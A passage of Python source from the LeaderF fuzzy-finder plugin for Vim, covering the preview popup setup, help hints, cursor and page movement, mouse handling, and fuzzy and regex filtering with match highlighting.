col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
if isinstance(source, int):
lfCmd("noautocmd silent! let winid = popup_create(%d, %s)" % (source, json.dumps(options)))
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
lfCmd("silent! let winid = popup_create(content, %s)" % json.dumps(options))
lfCmd("call win_execute(winid, 'doautocmd filetypedetect BufNewFile %s')" % escQuote(source))
self._preview_winid = int(lfEval("winid"))
if self._current_mode == 'NORMAL':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#normalModePreviewFilter', [%d]))"
% (self._preview_winid, id(self)))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal foldmethod=manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call win_execute(%d, 'setlocal cursorlineopt=both')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
self._orig_line = self._getInstance().currentLine
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
self._orig_line = self._getInstance().currentLine
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
if self._orig_line == line and (self._getInstance().buffer.options['modifiable']
or self._getInstance().getWinPos() in ('popup', 'floatwin')):
return False
self._orig_line = self._getInstance().currentLine
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().mimicCursor()
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _inHelpLines(self):
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return True
elif self._getInstance().window.cursor[0] <= self._help_length:
return True
return False
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! 10k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! 10j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")"""
% (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")"""
% (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')"
% (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
self._previewResult(False)
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer to indicate the number of lines to filter one time.
filter_method: A function to apply `content` as parameter and
return an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a list, each item is a pair (weight, line)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
use_fuzzy_engine = False
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False, is_and_mode=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False, is_and_mode=True)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False, is_and_mode=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
do_sort = "--no-sort" not in self._arguments
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight = fuzzy_match.getWeightNoSort
else:
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
if "--no-sort" in self._arguments:
getWeight_0 = fuzzy_match_0.getWeightNoSort
else:
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
if "--no-sort" in self._arguments:
getWeight_1 = fuzzy_match_1.getWeightNoSort
else:
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File":
return_index = False
if self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_File,
param=fuzzyEngine.createParameter(1),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Rg":
return_index = False
if "--match-path" in self._arguments:
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Rg,
param=fuzzyEngine.createRgParameter(self._getExplorer().displayMulti(),
self._getExplorer().getContextSeparator(), self._has_column),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Tag":
return_index = False
mode = 0 if self._cli.isFullPath else 1
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Tag,
param=fuzzyEngine.createParameter(mode), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Gtags":
return_index = False
result_format = 1
if self._getExplorer().getResultFormat() in [None, "ctags-mod"]:
result_format = 0
elif self._getExplorer().getResultFormat() == "ctags-x":
result_format = 2
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Gtags,
param=fuzzyEngine.createGtagsParameter(0, result_format, self._match_path),
is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() == "Line":
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatchPart, engine=self._fuzzy_engine,
pattern=pattern, category=fuzzyEngine.Category_Line,
param=fuzzyEngine.createParameter(1), is_name_only=True, sort_results=do_sort)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=do_sort)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=do_sort)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if "--no-sort" in self._arguments:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeightNoSort)
elif self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command", "Window", "QuickFix", "LocList"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
if do_sort:
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
else:
self._result_content = pair[1]
elif use_fuzzy_engine:
if step == 0:
if return_index == True:
step = 30000 * cpu_count
else:
step = 60000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 60000
elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
if "--no-sort" not in self._arguments:
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
if len(self._cli.pattern) > 1 and not is_continue:
lfCmd("redraw")
def _guessFilter(self, filename, suffix, dirname, icon, iterable):
"""
return a list, each item is a pair (weight, line)
"""
icon_len = len(icon)
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line[icon_len:]), line) for line in iterable)
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if lfEval("get(g:, 'Lf_ShowDevIcons', 1)") == "1":
icon = webDevIconsGetFileTypeSymbol(basename)
else:
icon = ''
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, icon=icon, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname, icon)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, "let matchid = matchaddpos('%s', %s)")"""
% (self._getInstance().getPopupWinId(), hl_group, str(pos[j:j+8])))
id = int(lfEval("matchid"))
else:
id = int(lfEval("matchaddpos('%s', %s)" % (hl_group, str(pos[j:j+8]))))
self._highlight_ids.append(id)
for i, pos in enumerate(self._highlight_refine_pos):
if self._getInstance().isReverseOrder():
pos = [[bottom - unit*i] + p for p in pos]
else:
pos = [[unit*i + 1 + self._help_length] + p for p in pos]
# The maximum number of positions is 8 in matchaddpos().
for j in range(0, len(pos), 8):
if self._getInstance().getWinPos() == 'popup':
